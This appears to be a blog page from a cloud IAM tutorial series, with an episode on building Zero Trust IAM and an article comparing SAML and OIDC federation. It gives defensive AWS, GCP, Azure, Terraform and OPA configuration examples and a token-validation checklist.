       ALLOW ──────────────────────► LOG every decision (allow and deny)
         │
         └── Continuous re-evaluation:
             device state changes → revoke
             anomaly detected → revoke or step-up
             credential age → require re-auth

Introduction

The perimeter model of network security made a bet: inside the network is trusted, outside is not. Lock down the perimeter tightly enough and you’re safe. VPN in, and you’re one of us.

I grew up professionally in that model. Firewalls, DMZs, trusted zones. The idea had intuitive appeal — you build walls, you control what crosses them. For a while it worked reasonably well.

Then I watched it fail, repeatedly, in ways that were predictable in hindsight. An engineer’s laptop gets compromised at a coffee shop. They VPN in. Now the attacker is “inside.” A contractor account gets phished. They have valid Active Directory credentials. They’re inside. A cloud service gets misconfigured and exposes a management interface. There’s no perimeter for that to be inside of.

The perimeter model failed not because the walls weren’t strong enough, but because the premise was wrong. There is no inside. There is no perimeter that reliably separates trusted from untrusted. In a world of remote work, cloud services, contractor access, and API integrations, the attack surface doesn’t respect network boundaries.

Zero Trust is the architecture built on a different premise: trust nothing implicitly. Verify everything explicitly. Minimize blast radius by assuming you will be breached.

This isn’t a product you buy. It’s a set of principles applied to how you design, build, and operate your IAM. This episode is how those principles translate to concrete practices — building on everything we’ve covered in this series.


The Three Principles

Verify Explicitly

Every request must carry verifiable identity and context. Network location is not identity.

Old model: request from 10.0.0.0/8 → trusted, proceed
Zero Trust: request from 10.0.0.0/8 → still must present verifiable identity
                                       still must pass authorization check
                                       still must pass context evaluation
                                       then proceed (or deny)

In cloud IAM terms: every API call carries identity claims (IAM role ARN, federated identity, managed identity), and those claims are verified against policy on every single request. There’s no concept of “once authenticated, trusted until logout.” In cloud IAM, this already exists natively. Every API call is authenticated and authorized independently. The challenge is extending this model to internal services, internal APIs, and human access patterns.

Implementation in practice:
– mTLS for service-to-service communication — both sides present certificates; identity is the certificate, not the network path
– Bearer tokens on every internal API call — no session cookies, no “we’re on the same VPC so it’s fine”
– Short-lived credentials everywhere — a compromised credential expires, not “after the session times out in 8 hours”

Use Least Privilege — Just-in-Time, Just-Enough

No standing access to sensitive resources. Access granted when needed, for the minimum scope, for the minimum duration.

Old model: alice is in the DBA group → permanent access to all databases
Zero Trust: alice requests access to production DB →
            verified: alice's device is enrolled in MDM and compliant
            verified: alice has an open change ticket for this task
            verified: current time is within business hours
            granted: connection to this specific database, from alice's specific IP
                     for 2 hours, then revoked automatically

This is JIT access. It reduces the window where a compromised credential can cause damage. It requires a change in how engineers think about access: access is not a property you have, it’s something you request when you need it. The operational friction is a feature, not a bug. Justifying each elevated access request is what keeps the access model honest.

Assume Breach

Design systems as if the attacker is already inside. This drives different decisions:

  • Micro-segmentation: one role per service, minimum permissions per role. If one service is compromised, it can’t pivot to everything else.
  • Log everything: every authorization decision, allow or deny. When you’re investigating an incident, you need to know what happened, not just that something happened.
  • Automate response: anomalous API call pattern → trigger automated credential revocation or session termination. Don’t wait for a human to notice.

Building Zero Trust IAM — Block by Block

Block 1: Strong Identity Foundation

You can’t verify explicitly without strong authentication. The starting point:

# AWS: require MFA for all IAM operations — enforce via SCP across the org
{
  "Effect": "Deny",
  "Action": "*",
  "Resource": "*",
  "Condition": {
    "BoolIfExists": {
      "aws:MultiFactorAuthPresent": "false"
    },
    "StringNotLike": {
      "aws:PrincipalArn": [
        "arn:aws:iam::*:role/AWSServiceRole*",
        "arn:aws:iam::*:role/OrganizationAccountAccessRole"
      ]
    }
  }
}
# GCP: enforce OS Login for VM SSH (ties SSH access to Google identity, not SSH keys)
gcloud compute project-info add-metadata \
  --metadata enable-oslogin=TRUE

# This means: SSH to a VM requires your Google identity to have roles/compute.osLogin
# or roles/compute.osAdminLogin. No more managing ~/.authorized_keys files on instances.

For human access: hardware FIDO2 keys (YubiKey, Google Titan) rather than TOTP where possible. TOTP codes can be phished in real-time adversary-in-the-middle attacks. Hardware keys cannot — the cryptographic challenge-response is bound to the origin URL.

Block 2: Device Posture as an Access Signal

In a Zero Trust model, the identity of the user is necessary but not sufficient. The state of the device matters too — a compromised endpoint with valid credentials is still a threat.

# Azure Conditional Access: block access from non-compliant devices
# (configures in Entra ID Conditional Access portal)
conditions:
  clientAppTypes: [browser, mobileAppsAndDesktopClients]
  devices:
    deviceFilter:
      mode: exclude
      rule: "device.isCompliant -eq True and device.trustType -eq 'AzureAD'"
grantControls:
  builtInControls: [compliantDevice]
# AWS Verified Access: identity + device posture for application access — no VPN
aws ec2 create-verified-access-instance \
  --description "Zero Trust app access"

# Attach identity trust provider (Okta OIDC)
aws ec2 create-verified-access-trust-provider \
  --trust-provider-type user \
  --user-trust-provider-type oidc \
  --oidc-options IssuerURL=https://company.okta.com,ClientId=...,ClientSecret=...,Scope=openid

# Attach device trust provider (Jamf, Intune, or CrowdStrike)
aws ec2 create-verified-access-trust-provider \
  --trust-provider-type device \
  --device-trust-provider-type jamf \
  --device-options TenantId=JAMF_TENANT_ID

AWS Verified Access allows users to reach internal applications by verifying both their identity (via OIDC) and their device health (via MDM) — without a VPN. The access gateway evaluates both signals on every connection, not just at login.

Block 3: Just-in-Time Privilege Elevation

No standing elevated access. Engineers are eligible for elevated roles; they activate them when needed.

# Azure PIM: engineer activates an eligible privileged role
az rest --method POST \
  --uri "https://graph.microsoft.com/v1.0/roleManagement/directory/roleAssignmentScheduleRequests" \
  --body '{
    "action": "selfActivate",
    "principalId": "USER_OBJECT_ID",
    "roleDefinitionId": "ROLE_DEF_ID",
    "directoryScopeId": "/",
    "justification": "Investigating security alert in tenant — incident ticket INC-2026-0411",
    "scheduleInfo": {
      "startDateTime": "2026-04-11T09:00:00Z",
      "expiration": {"type": "AfterDuration", "duration": "PT4H"}
    }
  }'
# Access activates, lasts 4 hours, then automatically removed
# AWS: temporary account assignment via Identity Center
# (typically triggered by ITSM workflow integration, not manual CLI)
aws sso-admin create-account-assignment \
  --instance-arn "arn:aws:sso:::instance/ssoins-xxx" \
  --target-id ACCOUNT_ID \
  --target-type AWS_ACCOUNT \
  --permission-set-arn "arn:aws:sso:::permissionSet/ssoins-xxx/ps-yyy" \
  --principal-type USER \
  --principal-id USER_ID

# Schedule deletion (using EventBridge + Lambda in a real deployment)
aws sso-admin delete-account-assignment \
  --instance-arn "arn:aws:sso:::instance/ssoins-xxx" \
  --target-id ACCOUNT_ID \
  --target-type AWS_ACCOUNT \
  --permission-set-arn "arn:aws:sso:::permissionSet/ssoins-xxx/ps-yyy" \
  --principal-type USER \
  --principal-id USER_ID

The operational change this requires: engineers stop thinking of access as something they hold permanently and start thinking of it as something they request for a specific purpose.

This feels like friction until you’re investigating an incident and you have a precise record of who activated what elevated access and why.

Block 4: Continuous Session Validation

Traditional auth: verify once at login, trust the session until timeout.
Zero Trust auth: re-evaluate access signals continuously throughout the session.

Session starts: identity verified + device compliant + IP in expected range
                → access granted

15 minutes later: impossible travel detected (IP changes to different country)
                  → step-up authentication required, or session terminated

Later: device compliance state changes (EDR detects malware)
       → all active sessions for this device revoked immediately

This requires integration between your identity platform and your device management / EDR tooling. Entra ID Conditional Access with Continuous Access Evaluation (CAE) implements this natively. When certain events occur — device compliance change, IP anomaly, token revocation — access tokens are invalidated within minutes rather than waiting for natural expiry.

// GCP: bind IAM access to an Access Context Manager access level
// Access level enforces device compliance — if device falls out of compliance,
// the access level is no longer satisfied and requests fail immediately
gcloud projects add-iam-policy-binding my-project \
  --member="user:[email protected]" \
  --role="roles/bigquery.admin" \
  --condition="expression=request.auth.access_levels.exists(x, x == 'accessPolicies/POLICY_NUM/accessLevels/corporate_compliant_device'),title=Compliant device required"

Block 5: Micro-Segmented Permissions

Every service has its own identity. Every identity has only what it needs. Compromise of one service cannot propagate to others.

# Terraform: IAM as code — each service gets a dedicated, scoped role
resource "aws_iam_role" "order_processor" {
  name                 = "svc-order-processor"
  permissions_boundary = aws_iam_policy.service_boundary.arn

  assume_role_policy = jsonencode({
    Version = "2012-10-17"
    Statement = [{
      Effect    = "Allow"
      Principal = { Service = "lambda.amazonaws.com" }
      Action    = "sts:AssumeRole"
    }]
  })
}

resource "aws_iam_role_policy" "order_processor" {
  name   = "order-processor-policy"
  role   = aws_iam_role.order_processor.id
  policy = jsonencode({
    Version = "2012-10-17"
    Statement = [
      {
        Effect   = "Allow"
        Action   = ["sqs:ReceiveMessage", "sqs:DeleteMessage", "sqs:GetQueueAttributes"]
        Resource = aws_sqs_queue.orders.arn
      },
      {
        Effect   = "Allow"
        Action   = ["dynamodb:PutItem", "dynamodb:GetItem", "dynamodb:UpdateItem"]
        Resource = aws_dynamodb_table.orders.arn
      }
    ]
  })
}
# Open Policy Agent: enforce IAM standards at the policy level
# Run this in CI/CD — fail the build if any policy statement has wildcard actions
package iam.policy

deny[msg] {
  input.Statement[i].Effect == "Allow"
  input.Statement[i].Action == "*"
  msg := sprintf("Statement %d has wildcard Action — not allowed", [i])
}

deny[msg] {
  input.Statement[i].Effect == "Allow"
  input.Statement[i].Resource == "*"
  endswith(input.Statement[i].Action, "Delete")
  msg := sprintf("Statement %d allows Delete on all resources — requires specific ARN", [i])
}

Block 6: Universal Audit Trail

Zero Trust without logging is just obscurity. Every authorization decision — allow and deny — must be logged, retained, and queryable.

# AWS: verify CloudTrail is comprehensive
aws cloudtrail get-trail-status --name management-trail
# Must have: LoggingEnabled=true, IsMultiRegionTrail=true, IncludeGlobalServiceEvents=true

# Verify no management events are excluded
aws cloudtrail get-event-selectors --trail-name management-trail \
  | jq '.EventSelectors[] | {ReadWrite: .ReadWriteType, Mgmt: .IncludeManagementEvents}'
# ReadWriteType should be "All"; IncludeManagementEvents should be true

# GCP: ensure Data Access audit logs are enabled for IAM
gcloud projects get-iam-policy my-project --format=json | jq '.auditConfigs'
# Should see auditLogConfigs for cloudresourcemanager.googleapis.com and iam.googleapis.com
# with both DATA_READ and DATA_WRITE enabled

# Azure: route Entra ID logs to Log Analytics for long-term retention and querying
az monitor diagnostic-settings create \
  --name entra-audit-to-la \
  --resource "/tenants/TENANT_ID/providers/microsoft.aad/domains/company.com" \
  --logs '[{"category":"AuditLogs","enabled":true},{"category":"SignInLogs","enabled":true}]' \
  --workspace /subscriptions/SUB_ID/resourceGroups/rg-monitoring/providers/Microsoft.OperationalInsights/workspaces/security-logs

Framework Alignment

Zero Trust IAM isn’t a framework itself — it’s a design philosophy. But it maps cleanly onto the controls that compliance frameworks are pushing organizations toward:

Framework Reference What It Covers Here
CISSP Domain 5 — IAM Zero Trust reframes IAM as continuous, context-aware verification rather than perimeter-based trust
CISSP Domain 1 — Security & Risk Management Assume breach as a risk management posture; blast radius minimization through least privilege
CISSP Domain 7 — Security Operations Continuous monitoring, anomaly detection, and automated response are operational requirements of Zero Trust
ISO 27001:2022 5.15 Access control Zero Trust access policy: verify explicitly, least privilege, assume breach
ISO 27001:2022 8.16 Monitoring activities Continuous session validation and universal audit trail — all authorization decisions logged
ISO 27001:2022 8.20 Networks security Micro-segmentation and mTLS replace implicit network trust with verified identity at every hop
ISO 27001:2022 5.23 Information security for cloud services Zero Trust architecture applied to cloud IAM across AWS, GCP, and Azure
SOC 2 CC6.1 Zero Trust logical access controls — JIT, device posture, context-aware authorization
SOC 2 CC6.7 Continuous session validation and transmission controls across all system components
SOC 2 CC7.1 Threat detection through universal audit trails and anomaly-triggered automated response
SOC 2 CC7.2 Incident response — automated revocation and session termination on anomaly detection

Zero Trust Maturity — Where to Start

In practice, most organizations think about Zero Trust as a destination — a large, multi-year program. The reality is it’s a direction. Any movement in that direction reduces risk.

Level Where You Are What to Build Next
1 — Initial Some MFA; static credentials for machines; no centralized IdP Eliminate machine static keys → workload identity
2 — Managed Centralized IdP; SSO for most systems; some MFA enforcement Close SSO gaps; enforce MFA everywhere; federate to cloud
3 — Defined Least privilege being enforced; audit tooling in use; JIT for some privileged access Expand JIT; policy-as-code in CI/CD; quarterly access reviews
4 — Contextual Device posture in access decisions; conditional access policies Continuous session evaluation; automated anomaly response
5 — Optimizing Policy-as-code everywhere; automated right-sizing; anomaly-triggered revocation Refine and maintain — Zero Trust is never “done”

The jump from Level 1 to Level 3 delivers the most security value per unit of effort. Start there. Don’t defer least privilege enforcement while you build a sophisticated device posture integration.


The Practical Sequence

If you’re building Zero Trust IAM from where most organizations are, this is the order that maximizes early security value:

  1. Inventory all identities — human and machine. You cannot secure what you can’t see. Build a complete picture before changing anything.

  2. Eliminate static credentials for machines — replace access keys and SA key files with workload identity. This is the highest-ROI change in most environments.

  3. Enforce MFA for all human access — especially cloud consoles, IdP admin, and VPN. Hardware keys for privileged accounts.

  4. Federate human identity — single IdP, SSO to cloud and major applications. Centralize the revocation path.

  5. Right-size IAM permissions — use last-accessed data and IAM Recommender to find and remove unused permissions. This is a continuous discipline, not a one-time clean-up.

  6. JIT for privileged access — Azure PIM, AWS Identity Center assignment automation, or equivalent for all elevated roles. No standing admin.

  7. IAM as code — all IAM changes via Terraform/Pulumi/CDK, reviewed in pull requests, validated by Access Analyzer or OPA in CI/CD, applied through automation.

  8. Continuous monitoring — alerts on IAM mutations, anomalous API call patterns, new cross-account trust relationships, new public resource exposures.

  9. Add context signals — Conditional Access policies incorporating device posture. Access Context Manager in GCP. AWS Verified Access for application access.

  10. Automated response — anomaly detected → automatic credential suspension or session termination. Close the window between detection and containment.


Series Complete

This series covered Cloud IAM from the question “what even is IAM?” to Zero Trust architecture:

Episode Topic The Core Lesson
EP01 What is IAM? Access management is deny-by-default; every grant is an explicit decision
EP02 AuthN vs AuthZ Two separate gates; passing one doesn’t open the other
EP03 Roles, Policies, Permissions Structure prevents drift; wildcards accumulate into exposure
EP04 AWS IAM Deep Dive Trust policies and permission policies are both required; the evaluation chain has six layers
EP05 GCP IAM Deep Dive Hierarchy inheritance is a feature that needs careful handling; service account keys are an antipattern
EP06 Azure RBAC and Entra ID Two separate authorization planes; managed identities are the right model for workloads
EP07 Workload Identity Static credentials for machines are solvable at the root; OIDC token exchange replaces them
EP08 IAM Attack Paths The attack chain runs through IAM; iam:PassRole and its equivalents are privilege escalation primitives
EP09 Least Privilege Auditing 5% utilization is the average; the 95% excess is attack surface — and it’s measurable
EP10 Federation, OIDC, SAML The IdP is the trust anchor; everything downstream is bounded by its security
EP11 Kubernetes RBAC Two separate IAM layers; both must be secured; cluster-admin is the first thing to audit
EP12 Zero Trust IAM Trust nothing implicitly; verify everything explicitly; minimize blast radius through least privilege at every layer

IAM is not a feature you configure. It’s a practice you maintain. The organizations that operate with genuinely low cloud IAM risk don’t have fewer identities — they have better visibility into what those identities can do, and why, and what happened when something went wrong.

That’s what this series has been building toward.


The full series is at linuxcent.com/cloud-iam-series. If you found it useful, the best thing you can do is subscribe — the next series covers eBPF: what’s actually running in kernel space when Cilium, Falco, and Tetragon are doing their work.

Subscribe → linuxcent.com/subscribe

SAML vs OIDC: Which Federation Protocol Belongs in Your Cloud?

Reading Time: 10 minutes


What Is Cloud IAMAuthentication vs AuthorizationIAM Roles vs PoliciesAWS IAM Deep DiveGCP Resource Hierarchy IAMAzure RBAC ScopesOIDC Workload IdentityAWS IAM Privilege EscalationAWS Least Privilege AuditSAML vs OIDC Federation


TL;DR

  • Federation means downstream systems trust the IdP’s signed assertion — they never see credentials and don’t manage them independently
  • SAML is XML-based, browser-oriented, the enterprise standard; OIDC is JWT-based, API-native, the modern protocol for workload identity and consumer SSO
  • In OIDC trust policies, the sub condition is the security boundary — omitting it means any GitHub Actions workflow in any repository can assume your role
  • Validate all JWT claims: signature, iss, aud, exp, sub — libraries do this, but need correct configuration (especially aud)
  • The IdP is the trust anchor: compromise the IdP and every downstream system is compromised. Treat IdP admin access with the same controls as your most sensitive system.
  • JIT provisioning and Conditional Access extend federation from “who are you” to “are you in an appropriate context right now”

The Big Picture

  FEDERATION: HOW TRUST FLOWS FROM IdP TO DOWNSTREAM SYSTEMS

  Identity Provider  (Okta / Entra ID / Google / AD FS)
  ┌──────────────────────────────────────────────────────────────────┐
  │  User or workload authenticates → IdP issues signed assertion   │
  │                                                                  │
  │  ┌──────────────────────────┐  ┌───────────────────────────┐   │
  │  │  SAML Assertion (XML)    │  │  OIDC ID Token (JWT)       │   │
  │  │  RSA-signed, 5–10 min    │  │  RS256-signed, ~1 hr      │   │
  │  │  Audience: SP entity ID  │  │  aud: client ID           │   │
  │  │  Subject: user identity  │  │  sub: specific workload   │   │
  │  └───────────┬──────────────┘  └──────────┬────────────────┘   │
  └─────────────────────────────────────────────────────────────────┘
                 │  human SSO                  │  workload identity
                 ▼                             ▼
  ┌─────────────────────────┐  ┌───────────────────────────────────┐
  │ SP validates signature  │  │ AWS STS / GCP STS validates       │
  │ + audience + timestamp  │  │ signature + iss + aud + sub       │
  │ → console session       │  │ → AssumeRoleWithWebIdentity       │
  └─────────────────────────┘  └───────────────────────────────────┘

  Security bound: IdP security bounds every system that trusts it
  Disable in Okta → access revoked everywhere that trusts Okta

Introduction

Before federation existed, every system had its own user database. Your Jira account. Your AWS account. Your Salesforce account. Your internal wiki. Each one had its own password, its own MFA, its own offboarding process. When an engineer joined, someone had to create accounts in every system. When they left, you hoped whoever processed the offboarding remembered to deactivate all of them.

I’ve done that audit — the one where you’re trying to figure out if a former employee still has access to anything. You go system by system, cross-reference against HR records, find accounts that exist in places you’ve forgotten the company even uses. In one environment I found an ex-engineer’s account still active in a vendor portal six months after they left, because that system was set up by someone who had since also left the company, and nobody had documented it.

Federation solves this structurally. One identity provider. One place to authenticate. One place to revoke. Every downstream system trusts the IdP’s assertion rather than managing credentials independently. Disable someone in Okta and they lose access everywhere that trusts Okta — immediately, without a checklist.

This episode is how federation actually works at the protocol level, because understanding the mechanism is what lets you design it securely. A federation setup with a trust policy that accepts assertions from any OIDC issuer is worse than no federation — it’s a false sense of security.


The Federation Model

Identity Provider (IdP)          Service Provider (SP) / Relying Party
  (Okta, Google, AD FS, Entra ID)       (AWS, Salesforce, GitHub, your app)
         │                                          │
         │  1. User authenticates to IdP             │
         │     (password + MFA)                      │
         │                                          │
         │  2. IdP generates a signed assertion      │
         │     (SAML response or OIDC ID Token)      │
         │ ──────────────────────────────────────── ▶│
         │                                          │
         │  3. SP validates the signature            │
         │     (using IdP's public certificate       │
         │      or JWKS endpoint)                    │
         │  4. SP maps identity to local permissions │
         │  5. SP grants access                      │

The SP never sees the user’s password. It never has one. It trusts the IdP’s cryptographic signature — if the assertion is signed with the IdP’s private key, and the SP trusts that key, the identity is accepted.

This trust chain has one critical property: the security of every SP is bounded by the security of the IdP. Compromise the IdP, and every system that trusts it is compromised. This is why IdP security deserves the same attention as the most sensitive system it gates access to.


SAML 2.0 — The Enterprise Standard

SAML (Security Assertion Markup Language) is XML-based, verbose, and battle-tested. Published in 2005, it’s the protocol behind most enterprise SSO deployments. When your company says “use your corporate login for this vendor app,” SAML is usually the mechanism.

How a SAML Login Flows

1. User visits AWS console (the Service Provider)
2. AWS checks: no active session → redirect to IdP
   → https://company.okta.com/saml?SAMLRequest=...
3. Okta authenticates the user (password, MFA)
4. Okta generates a SAML Assertion — a signed XML document containing:
   - Who the user is (Subject, typically email)
   - Their attributes (group memberships, custom attributes)
   - When the assertion was issued and when it expires (valid 5-10 minutes typically)
   - Which SP this is for (Audience restriction)
   - Okta's digital signature (RSA-SHA256 or similar)
5. Browser POSTs the assertion to AWS's ACS (Assertion Consumer Service) URL
6. AWS validates the signature against Okta's public cert (retrieved from Okta's metadata URL)
7. AWS reads the SAML attribute for the IAM role
8. AWS calls sts:AssumeRoleWithSAML → issues temporary credentials
9. User gets a console session — no AWS credentials were ever stored anywhere

What a SAML Assertion Actually Looks Like

<saml:Assertion>
  <saml:Issuer>https://okta.company.com</saml:Issuer>

  <saml:Subject>
    <saml:NameID>[email protected]</saml:NameID>
  </saml:Subject>

  <saml:AttributeStatement>
    <!-- This attribute tells AWS which IAM role to assume -->
    <saml:Attribute Name="https://aws.amazon.com/SAML/Attributes/Role">
      <saml:AttributeValue>
        arn:aws:iam::123456789012:role/EngineerRole,arn:aws:iam::123456789012:saml-provider/OktaProvider
      </saml:AttributeValue>
    </saml:Attribute>
  </saml:AttributeStatement>

  <!-- Critical: time bounds on this assertion -->
  <saml:Conditions NotBefore="2026-04-11T09:00:00Z" NotOnOrAfter="2026-04-11T09:05:00Z">
    <saml:AudienceRestriction>
      <!-- Critical: this assertion is ONLY valid for AWS -->
      <saml:Audience>https://signin.aws.amazon.com/saml</saml:Audience>
    </saml:AudienceRestriction>
  </saml:Conditions>

  <ds:Signature>... RSA-SHA256 signature over the above ...</ds:Signature>
</saml:Assertion>

The Audience restriction and the NotOnOrAfter timestamp are two of the most security-critical fields. The audience ensures this assertion can’t be reused for a different SP. The timestamp ensures it can’t be replayed after expiry.

Setting Up SAML Federation with AWS

# Register Okta as a SAML provider in AWS IAM
aws iam create-saml-provider \
  --saml-metadata-document file://okta-metadata.xml \
  --name OktaProvider

# Create the IAM role that federated users will assume
aws iam create-role \
  --role-name EngineerRole \
  --assume-role-policy-document '{
    "Version": "2012-10-17",
    "Statement": [{
      "Effect": "Allow",
      "Principal": {
        "Federated": "arn:aws:iam::123456789012:saml-provider/OktaProvider"
      },
      "Action": "sts:AssumeRoleWithSAML",
      "Condition": {
        "StringEquals": {
          "SAML:aud": "https://signin.aws.amazon.com/saml"
        }
      }
    }]
  }'

# In Okta: configure the AWS IAM Identity Center app
# Attribute mapping: https://aws.amazon.com/SAML/Attributes/Role
# Value: arn:aws:iam::123456789012:role/EngineerRole,arn:aws:iam::123456789012:saml-provider/OktaProvider

# Set maximum session duration (8 hours is reasonable for human access)
aws iam update-role \
  --role-name EngineerRole \
  --max-session-duration 28800

SAML Attack Surface

Attack What It Does Why It Works Prevention
XML Signature Wrapping (XSW) Attacker inserts a malicious assertion, wraps it around the legitimate signed one; some SPs validate the wrong element SAML’s XML structure is complex; naive signature validation checks the signed element, not the element the SP reads Use a vetted SAML library — never hand-roll parsing
Assertion replay Steal a valid assertion (e.g., via network intercept) and replay it before NotOnOrAfter If the SP doesn’t track used assertion IDs, the same assertion can be used multiple times Short expiry; SP tracks seen assertion IDs
Audience bypass SP doesn’t verify the Audience field An assertion issued for SP A can be used at SP B Always validate Audience matches your SP entity ID

XML Signature Wrapping is the most interesting attack historically — it was how security researchers demonstrated SAML implementations in AWS, Google, and others could be bypassed before vendors patched their libraries. The lesson: SAML is complex enough that rolling your own parser is asking for a vulnerability.


OpenID Connect (OIDC) — The Modern Protocol

OIDC is JSON-based, REST-native, and designed for the web and API-first world. Built on top of OAuth 2.0, it’s the protocol behind “Sign in with Google,” GitHub’s OIDC tokens for Actions, and workload identity federation across cloud providers.

Token Anatomy

An OIDC ID Token is a JWT — three base64-encoded parts separated by dots:

Header.Payload.Signature

Header:
{
  "alg": "RS256",           ← signing algorithm
  "kid": "key-id-123"       ← which key signed this (for JWKS rotation)
}

Payload (the claims):
{
  "iss": "https://accounts.google.com",         ← who issued this token
  "sub": "108378629573454321234",               ← stable user identifier (not email)
  "aud": "my-app-client-id",                   ← who this token is for
  "exp": 1749600000,                           ← expires at (Unix timestamp)
  "iat": 1749596400,                           ← issued at
  "email": "[email protected]",
  "email_verified": true,
  "hd": "company.com"                          ← hosted domain (Google Workspace)
}

Signature: RSA-SHA256(base64(header) + "." + base64(payload), idp_private_key)

The relying party (your application, or AWS STS) validates the signature using the IdP’s public keys — available at the JWKS endpoint (/.well-known/jwks.json). The signature verification proves the token was issued by the expected IdP and hasn’t been tampered with since.

The Full OIDC Token Exchange (GitHub Actions → AWS)

# GitHub Actions automatically provides an OIDC token in the runner environment
# The token contains: iss=token.actions.githubusercontent.com, repo, ref, sha, run_id, etc.

# Step 1: Fetch the OIDC token from GitHub's token service
TOKEN=$(curl -H "Authorization: bearer $ACTIONS_ID_TOKEN_REQUEST_TOKEN" \
  "$ACTIONS_ID_TOKEN_REQUEST_URL&audience=sts.amazonaws.com" | jq -r '.value')

# Step 2: Present to AWS STS for exchange
aws sts assume-role-with-web-identity \
  --role-arn arn:aws:iam::123456789012:role/GitHubActionsRole \
  --role-session-name github-deploy \
  --web-identity-token "${TOKEN}"

# STS performs these validations:
# 1. Fetch GitHub's JWKS: https://token.actions.githubusercontent.com/.well-known/jwks
# 2. Verify signature is valid
# 3. Verify iss = "token.actions.githubusercontent.com" (matches OIDC provider)
# 4. Verify aud = "sts.amazonaws.com"
# 5. Verify sub matches the trust policy condition
# 6. Verify exp is in the future

The trust policy condition on the IAM role is what prevents any GitHub repository from assuming this role:

{
  "Version": "2012-10-17",
  "Statement": [{
    "Effect": "Allow",
    "Principal": {
      "Federated": "arn:aws:iam::123456789012:oidc-provider/token.actions.githubusercontent.com"
    },
    "Action": "sts:AssumeRoleWithWebIdentity",
    "Condition": {
      "StringEquals": {
        "token.actions.githubusercontent.com:aud": "sts.amazonaws.com",
        "token.actions.githubusercontent.com:sub": "repo:my-org/my-repo:ref:refs/heads/main"
      }
    }
  }]
}

The sub condition is the security boundary. repo:my-org/my-repo:ref:refs/heads/main means: only runs triggered from the main branch of my-org/my-repo can assume this role. A pull request from a fork, a run from a different repo, or a run from a different branch — all get a different sub claim and the assumption fails.

I’ve reviewed trust policies that omit the sub condition and just check aud. That means any GitHub Actions workflow — in any repository, owned by anyone — can assume that role. That’s not a misconfiguration to be theoretical about: public GitHub repositories exist, and they can trigger GitHub Actions.

OIDC Validation Checklist

Every application that validates OIDC tokens must check all of these:

✓ Signature valid (using IdP's JWKS endpoint — not a hardcoded key)
✓ iss matches the expected IdP URL
✓ aud matches your application's client ID (not just "any audience")
✓ exp is in the future
✓ nbf (not before), if present, is in the past
✓ iat is recent (within your clock skew tolerance)
✓ For workload identity: sub is pinned to the specific workload

Skipping aud validation is the most common mistake. A token issued for application A with aud: app-a-client-id should not be accepted by application B. Without audience validation, any application in your system that can obtain a token for the IdP can reuse it at any other application. Libraries like python-jose and jsonwebtoken validate aud by default — but they need to be configured with the expected audience value.


Enterprise Federation Patterns

Multi-Account AWS with IAM Identity Center + Okta

The pattern I deploy in every multi-account AWS environment:

Okta (IdP)
  └── IAM Identity Center
        ├── Account: prod     → Permission Sets: ReadOnly, DevOps
        ├── Account: staging  → Permission Sets: Developer  
        ├── Account: shared   → Permission Sets: NetworkAdmin, SecurityAudit
        └── Account: sandbox  → Permission Sets: Admin (sandbox only)
# Engineers access accounts through Identity Center portal
aws configure sso
# Prompts: SSO start URL, region, account, role

aws sso login --profile prod-readonly

# List available accounts and roles (useful for tooling and scripts)
aws sso list-accounts --access-token "${TOKEN}"
aws sso list-account-roles --access-token "${TOKEN}" --account-id "${ACCOUNT_ID}"

# Get temporary credentials for a specific account/role
aws sso get-role-credentials \
  --account-id "${ACCOUNT_ID}" \
  --role-name ReadOnly \
  --access-token "${TOKEN}"

When an engineer is offboarded from Okta, they lose access to every AWS account immediately. No individual IAM user deletion across 20 accounts. No access key hunting. One action in Okta, complete revocation.

Just-in-Time (JIT) Provisioning

Rather than creating user accounts in every downstream system ahead of time, JIT provisioning creates accounts on first login:

  1. User authenticates to IdP
  2. SAML/OIDC assertion includes group memberships and attributes
  3. SP receives assertion, checks if a user account exists for this sub
  4. If not: create the account with attributes from the assertion
  5. Grant access based on group claims
  6. On subsequent logins: update the account’s attributes if claims changed

The security property: when a user is disabled in the IdP, their account in downstream systems becomes inaccessible even if the account object still exists. There’s nothing to log in with. JIT accounts don’t survive IdP deletion — they’re inactive shells that produce no risk.


The IdP Is the Trust Anchor — Protect It Accordingly

The entire security of a federated system is bounded by the security of the IdP. If an attacker can log into Okta as an admin, they can issue valid SAML assertions for any user, for any role, to any SP that trusts Okta. Every downstream system is compromised simultaneously.

This is not theoretical. In the 2023 Caesars and MGM Resorts attacks, initial access was achieved through social engineering against identity provider support — not through technical exploitation of cloud infrastructure. Once identity infrastructure is compromised, everything downstream follows.

What this means practically:

  • MFA for all IdP admin accounts — hardware FIDO2 keys, not TOTP. TOTP codes can be phished in real-time. Hardware keys cannot.
  • PIM / JIT access for IdP configuration changes — no standing admin access
  • Separate monitoring and alerting for IdP admin activity
  • Audit who can modify SAML/OIDC configurations and attribute mappings in the IdP — these are the levers for privilege escalation
  • Narrow audience restrictions — configure which SPs can receive assertions; don’t create a wildcard IdP configuration that serves all SPs

Conditional Access — Adding Context to Federation

Modern IdPs support Conditional Access policies that restrict when assertions are issued:

// Entra ID Conditional Access: require MFA + compliant device for AWS access
{
  "conditions": {
    "applications": {
      "includeApplications": ["AWS-Application-ID-in-Entra"]
    },
    "users": {
      "includeGroups": ["all-employees"]
    },
    "locations": {
      "excludeLocations": ["NamedLocation-CorporateNetwork"]
    }
  },
  "grantControls": {
    "operator": "AND",
    "builtInControls": ["mfa", "compliantDevice"]
  }
}

This policy: when an employee accesses AWS from outside the corporate network, they must use MFA on a device that MDM has verified as compliant. From inside the network, the policy still applies but the named location exclusion can relax certain requirements.

Conditional Access is how you move beyond “authenticated to IdP” as the only gate. Device health, network location, risk score — these become inputs to the access decision.


Framework Alignment

Framework Reference What It Covers Here
CISSP Domain 5 — Identity and Access Management Federation is the mechanism for extending identity trust across organizational boundaries
CISSP Domain 3 — Security Architecture Trust relationships must be explicitly designed; overly broad federation trust is an architectural failure
ISO 27001:2022 5.19 Information security in supplier relationships Federation with third-party IdPs and SPs establishes a cross-organizational trust boundary that must be governed
ISO 27001:2022 8.5 Secure authentication SAML and OIDC are the secure authentication protocols for federated access — token validation requirements
ISO 27001:2022 5.17 Authentication information Credential lifecycle in federated systems — no passwords distributed to SPs; IdP manages authentication
SOC 2 CC6.1 Federated identity is the access control mechanism for human access to cloud environments in CC6.1
SOC 2 CC6.6 Logical access from outside system boundaries — federation with external IdPs and partner organizations

Key Takeaways

  • Federation means downstream systems trust the IdP’s signed assertion — they never see credentials and don’t need to manage them independently
  • SAML is XML-based, browser-oriented, widely supported for enterprise SSO; OIDC is JWT-based, API-friendly, the protocol for modern workload identity and consumer SSO
